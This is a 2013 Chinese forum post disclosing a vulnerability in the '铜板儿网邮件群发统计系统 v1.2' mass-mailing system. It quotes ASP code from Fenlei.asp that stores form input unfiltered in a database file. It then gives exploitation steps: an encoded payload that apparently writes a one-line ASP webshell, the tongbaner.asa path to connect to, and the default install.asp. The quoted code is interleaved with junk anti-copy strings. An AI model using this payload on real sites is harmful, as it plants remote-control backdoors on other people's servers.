找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1985|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp / l+ y0 [4 b: V6 s! G, l2 p5 }- J  D
' _/ D1 ?0 R  B
IF Request.QueryString("Action")="del" Then
6 B4 z+ K% c- X5 V- q0 pID=Request.QueryString("ID") 9 p* \0 n! D/ C6 C6 a+ J3 n
IF Countss ("tui","Fenlei",ID )<>0 then ) L" |1 ~) f% N7 j' i
'略 1 @5 C9 y* F/ d6 q
IF Request.QueryString("Action")="Add" Then 5 B# z& I' L7 X  F: ~
Tname=Request.Form("Typename")
1 T2 @5 ~& P; |6 @. QSet Rs=Server.CreateObject("adodb.Recordset")   [  |2 c1 m8 n6 |& Q
Sql="Select * From Fenlei Order by id Desc " " Z# z- s- ^9 Q3 n1 b
Rs.Open Sql,Conn,1,3 # q( Q; A/ U3 t7 d& b0 X
Rs.Addnew 4 c; i( q" j6 H7 p, K5 _
Rs("Typename")=Tname 3 c) a8 q  j1 [; C7 I6 c8 C
'略
* w& a- ~, z- NSet Rs=Server.CreateObject("adodb.Recordset")
7 H/ Z/ l3 q6 V  @# n/ JSql="Select * From Fenlei Order by id Desc "
) b. U) h2 U& Z% ^Rs.Open Sql,Conn,1,1
5 L, O& P- P' k, d4 e) ]* k0 w$ z'略 5 o/ R9 A9 }7 k$ g: R- c
%>
- E8 Z- u* {. a8 ~$ x' Y. o / [/ e, |0 }2 M  C# _4 A

: b" F6 B3 ]2 T+ w7 ~3 W$ x  ^7 E
5 S* H/ G2 h) A没有过滤,直接写入数据库。$ f) q. ]2 Q3 S" t6 S2 R/ x; c

  f! }" X' h0 B& ]( _& T利用方法:
* j  t. ?2 e% h2 h, J   a/ L- M$ u8 I9 v+ E; x( B
插入:┼攠數畣整爠煥敵瑳∨≡┩>
( p- X) l, E. M 1 }& q5 {# m  B0 B) k% e! q
" C) v( B2 ?. |  B2 q* ]
连接: http://www.xxx.com/###tongbaner.asa $ O9 y+ @' O7 n. V3 a8 \
'默认安装文件: ! R4 _0 t  E/ C2 Z- M! b$ I1 F
'install.asp
" n3 Y0 l5 R# T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表